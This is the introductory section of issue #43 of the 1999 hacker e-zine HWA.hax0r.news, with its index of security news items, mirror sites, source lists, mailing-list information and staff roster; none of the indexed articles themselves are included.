[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
=                       <=-[ HWA.hax0r.news ]-=>                         =
==========================================================================
[=HWA'99=] Number 43 Volume 1 1999 Nov 21st 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================

Shit a week late again, another fucking cold, man I hate colds! fuck, anyway this issue covers Nov 14th - Nov 21st. #44 will cover Nov 22nd to Nov 28th. Seen?

==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================

Today the spotlight may be on you, some interesting machines that have accessed these archives recently...
[ ASCII art banner: Hits ]

homer.nawcad.navy.mil
maggie.nawcad.navy.mil
lisa.nawcad.navy.mil
msproxy.transcom.mil
b-kahuna.hickam.af.mil
sc034ws109.nosc.mil
infosec.se
gate2.mcbutler.usmc.mil
sc034ws109.nosc.mil
shq-ot-1178.nosc.mil
dhcp-036190.scott.af.mil
mcreed.lan.teale.ca.gov
dodo.nist.gov
kwai11.nsf.gov
enduser.faa.gov
vasfw02,fdic.gov
lisa.defcen.gov.au
ps1.pbgc.gov
guardian.gov.sg
amccss229116.scott.af.mil
sc022ws224.nosc.mil
sheppard2.hurlburt.af.mil
marshall.us-state.gov
digger1.defence.gov.au
firewall.mendoza.gov.ar
ipaccess.gov.ru
gatekeeper.itsec-debis.de
fgoscs.itsec-debis.de
fhu-ed4ccdf.fhu.disa.mil
citspr.tyndall.af.mil
kelsatx2.kelly.af.mil
kane.sheppard.af.mil
relay5.nima.mil
host.198-76-34-33.gsa.gov
ntsrvr.vsw.navy.mil
saic2.nosc.mil
wygate.wy.blm.gov
mrwilson.lanl.gov
p722ar.npt.nuwc.navy.mil
ws088228.ramstein.af.mil
car-gw.defence.gov.au
unknown-c-23-147.latimes.com
nytgate1.nytimes.com

There are some interesting machines among these, the *.nosc.mil boxes are from SPAWAR information warfare centres, good to see our boys keeping up with the news... - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Web site sponsored by CUBESOFT networks http://www.csoft.net check them out for great fast web hosting!

http://www.csoft.net/~hwa

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

The Hacker's Ethic

Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a pejorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows:

1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking, not bogus criteria such as degrees, age, race, or position.
5 - You create art and beauty on a computer.
6 - Computers can change your life for the better.

The Internet as a whole reflects this ethic.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

A Comment on FORMATTING:

Oct'99 - Started 80 column mode format, code is still left untouched since formatting will destroy syntax.

I received an email recently about the formatting of this newsletter, suggesting that it be formatted to 75 columns. In the past I've endeavoured to format all text to 80 cols except for articles and site statements and urls which are posted verbatim. I've decided to continue with this method unless more people complain, the zine is best viewed in 1024x768 mode with UEDIT.... - Ed

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

New mirror sites

http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/

* Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed the file size limitations imposed by the sites :-( please only use these if no other recourse is available.
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys.

http://www.csoft.net/~hwa

HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

SYNOPSIS (READ THIS)
--------------------

The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance).

This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle...

@HWA

=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #43
=-----------------------------------------------------------------------=

We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi...

**************************************************************************
[ ASCII art banner: Efnet ]
Eris Free Net #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed        ***
***                                                                    ***
*** please join to discuss or impart news on from the zine and around  ***
*** the zine or just to hang out, we get some interesting visitors you ***
*** could be one of em.                                                ***
***                                                                    ***
*** Note that the channel isn't there to entertain you its purpose is  ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips  ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
***                                                                    ***
**************************************************************************

=--------------------------------------------------------------------------=
[ ASCII art banner: Contents ]
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=

00.0 .. COPYRIGHTS
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC
00.2 .. SOURCES
00.3 .. THIS IS WHO WE ARE
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?
00.5 .. THE HWA_FAQ V1.0

ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly". This is our new motto.

=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=

01.0 .. GREETS
01.1 .. Last minute stuff, rumours, newsbytes
01.2 .. Mailbag
02.0 .. From the Editor
03.0 .. Bubbleboy email worm description
04.0 .. WinNT.Infis.4608 new Win NT virus
05.0 .. OSALL Interview with Flipz 1st person to deface a Microsoft site.
06.0 .. Online encrypted privacy for email and WWW
07.0 .. More on the Chris Buckley Saga
08.0 .. Security Practices Today, Or Lack Thereof
09.0 .. Internet Wiretapping Still a Possibility
10.0 .. Stock Prices Manipulated in China
11.0 .. Rumours: Vent of level Seven raided by FBI
12.0 .. Electronic Information Stolen from Egypt
13.0 .. Aleph One Gives NPR Interview
14.0 .. South American Con Announced
15.0 .. New Ezines Released
16.0 .. BO2K Marketing Plan (Very funny reading, check this out)
17.0 .. Canada Loses Classified Documents
18.0 .. Guilty Plea in Media City Defacement
19.0 .. Hong Kong's Department of Highways Defaced
20.0 .. You Have No Privacy Anyway (scary)
21.0 .. ACLU to Monitor Echelon
22.0 .. NSA Gets Patent on Analyzing Speech
23.0 .. New Ezine and Web Site - PrivacyPlace Launches
24.0 .. Vendor Response Archive
25.0 .. Another from Cuartango: More Microsoft Security Holes
26.0 .. DOD helps Local Cops in Fighting CyberCrime
27.0 .. BSA Busts IRC Pirates
28.0 .. US Concerned About Chinese Statements
29.0 .. The state of the net in Bulgaria
30.0 .. More on the PIII chip ID
31.0 .. Security Lawsuits Next After Y2K
32.0 .. Another Singaporean Cyber Intruder Pleads Guilty
33.0 .. SingCERT Releases Year to Date Stats
34.0 .. Canadian Telecom Firm Gets Security Clearance
35.0 .. Dell Gets Some FunLove
36.0 .. Melissa Hits Disney
37.0 .. How the Anti Virus Industry Works
38.0 .. FBI Releases Anti Cyber Crime Video
39.0 .. Adobe Introduces Potentially Flawed Security System
40.0 .. The 'Enemy' Speaks at Security Conference
41.0 .. Defense Fund Started for Warez4Cable + interviews
42.0 .. Menwith Hill To Get Upgrade Monies
43.0 .. CSIS Lost Classified Floppy Disk (hahaha)
44.0 .. Hitachi Chip May Prevent Use of Third-party Printer Cartridges
45.0 .. NEW MACRO VIRUS OUT THERE
46.0 .. GLOBALNET, CROATIAN ISP COMPROMISED
47.0 .. SEC FILES CHARGES
48.0 .. G6 FTP SERVER v2.0 PROBLEMS
49.0 .. RED HAT SECURITY ADVISORY
50.0 .. HPING
51.0 .. RPM UPDATE HELPING UTILITY
52.0 .. WebBBS Ver2.13 Exploit / Shadow Penguin Security
53.0 .. SENATE.GOV BITES THE DUST
54.0 .. NEW NESSUS
55.0 .. DELEGATE BUFFER OVERFLOWS
56.0 .. SSH PROBLEMS
57.0 .. TORVALDS: COUPLE OF QUESTIONS
58.0 .. 2K PREPARATIONS CAUSED PROBLEMS
59.0 .. IS MICROSOFT TO BLAME FOR Y2K?
60.0 .. $50 MILLIONS FOR Y2K CENTER
61.0 .. EYES ON EXEC 2.32
62.0 .. CHECKPOINT AND LINUX
63.0 .. NOVELL SIMPLIFIES THINGS
64.0 .. RPC.NFSD PROBLEMS
65.0 .. Eserv 2.50 Web interface Server Directory Traversal Vulnerability
66.0 .. RFP9906 - RFPoison

=-------------------------------------------------------------------------------=

AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information.
        Current dates: POSTPONED til further notice, place: TBA

Ha.Ha .. Humour and puzzles
         Hey You! Send in humour for this section! I need a laugh and its hard to find good stuff... ;)

SITE.1 .. Featured site
H.W .. Hacked Websites
A.0 .. APPENDICES
A.1 .. PHACVW linx and references

=--------------------------------------------------------------------------=
@HWA'99

00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT?
V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).

Important semi-legalese and license to redistribute:

YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINKS ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news

IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org

THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD

Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :)

No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it.

cruciphux@dok.org

Cruciphux [C*:.]

00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks.

Send all goodies to:

HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5

WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx.

Ideas for interesting 'stuff' to send in apart from news:

- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n.
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof.
Stuff you can email:

- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*

If you still can't think of anything you're probably not that interesting a person after all so don't worry about it

Our current email:

Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net

Websites;

sAs72.......................: http://members.tripod.com/~sAs72/
Cruciphux...................: http://www.geocities.com/Area51/Lair/8913/

@HWA

00.2 Sources ***
~~~~~~~~~~~

Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed.

News & I/O zine ..................http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/ *DOWN*
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org

+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ...

http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk

alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>

NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)

NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site

Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~

All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care whether the article/email is to be used in an issue or not and may be used at my discretion.

Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html

Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box.

- Ed

Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~

ISS Security mailing list faq : http://www.iss.net/iss/maillist.html

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks.

Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list's charter.

I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list.

Please follow the below guidelines on what kind of information should be posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author.

For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM.
What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's.

The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently.

Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be:

BUGTRAQ@SECURITYFOCUS.COM

Security Focus will also be providing a free searchable vulnerability database.

BUGTRAQ es muy bueno
--------------------

It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information.

As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator.

In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina (the folks that brought you Secure Syslog and the SSH insertion attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information.
Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com.

On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available:

* Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to others that may be potentially affected.

The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits, new trojan horses and viruses, source of attacks and tell-tale signs of intrusions.

To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of:

SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process.

*Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com.

On the information resource front you find a large database of the following:

* Vulnerabilities.
We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well as links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade.

* Products. An incredible number of categorized security products from over two hundred different vendors.

* Services. A large and focused directory of security services offered by vendors.

* Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly from our servers when possible.

* Tools. A large array of free security tools. Categorized and available for download.

* News: A vast number of security news articles going all the way back to 1995.

* Security Resources: A directory to other security resources on the net.

As well as many other things such as an event calendar.

For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display.

I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com.

Cheers.
--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com.

CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my way I'd reproduce them ALL here, well almost all .... ;-) - Ed

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[ New ISN announcement (New!!)

Sender: ISN Mailing List
From: mea culpa
Subject: Where has ISN been?
Comments: To: InfoSec News
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away.. Not really.

Several months ago the system that hosted the ISN mail list was taken offline. Before that occurred, I was not able to retrieve the subscriber list. Because of that, the list has been down for a while. I opted to wait to get the list back rather than attempt to make everyone resubscribe.

As you can see from the headers, ISN is now generously being hosted by Security Focus [www.securityfocus.com]. They are providing the bandwidth, machine, and listserv that runs the list now.

Hopefully, this message will find all ISN subscribers, help us weed out dead addresses, and assure you the list is still here. If you have found the list to be valuable in the past, please tell friends and associates about the list. To subscribe, mail listserv@securityfocus.com with "subscribe isn firstname lastname". To unsubscribe, "unsubscribe isn".

As usual, comments and suggestions are welcome. I apologize for the down time of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04 0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters to distribution of information security news articles. These articles will come from newspapers, magazines, online resources, and more. The subject line will always contain the title of the article, so that you may quickly and efficiently filter past the articles of no interest.

This list will contain:

 o Articles catering to security, hacking, firewalls, new security encryption, products, public hacks, hoaxes, legislation affecting these topics and more.
 o Information on where to obtain articles in current magazines.
 o Security Book reviews and information.
 o Security conference/seminar information.
 o New security product information.
 o And anything else that comes to mind..

Feedback is encouraged.
The list maintainers would like to hear what you think of the list, what could use improving, and which parts are "right on". Subscribers are also encouraged to submit articles or URLs. If you submit an article, please send either the URL or the article in ASCII text. Further, subscribers are encouraged to give feedback on articles or stories, which may be posted to the list.

Please do NOT:

 * subscribe vanity mail forwards to this list
 * subscribe from 'free' mail addresses (ie: juno, hotmail)
 * enable vacation messages while subscribed to mail lists
 * subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking down dead accounts very difficult. I am currently receiving as many as fifty returned mails a day. Any of the above are grounds for being unsubscribed. You are welcome to resubscribe when you address the issue(s).

Special thanks to the following for continued contribution: William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn, Felix von Leitner, Phreak Moi and other contributors.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa'. ISN is a private list. Moderation of topics, member subscription, and everything else about the list is solely at his discretion.

The ISN membership list is NOT available for sale or disclosure.

ISN is a non-profit list. Sponsors are only donating to cover bandwidth and server costs.

@HWA

00.3 THIS IS WHO WE ARE
     ~~~~~~~~~~~~~~~~~~

 Some HWA members and Legacy staff
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 cruciphux@dok.org.........: currently active/editorial
 darkshadez@ThePentagon.com: currently active/man in black
 fprophet@dok.org..........: currently active/programming/IRC+ man in black
 sas2@usa.net .............: currently active/IRC+ distribution
 vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black
 dicentra...(email withheld): IRC+ grrl in black
 twisted-pair@home.com......: currently active/programming/IRC+

 Foreign Correspondents/affiliate members
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Qubik ............................: United Kingdom
 D----Y ...........................: USA/world media
 HWA members ......................: World Media

 Past Foreign Correspondents (currently inactive or presumed dead)
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 Sla5h.............................: Croatia
 N0Portz ..........................: Australia
 system error .....................: Indonesia
 Wile (wile coyote) ...............: Japan/the East
 Ruffneck ........................: Netherlands/Holland
 Wyze1.............................: South Africa

 Please send in your sites for inclusion here if you haven't already, also if you want your emails listed send me a note ... - Ed

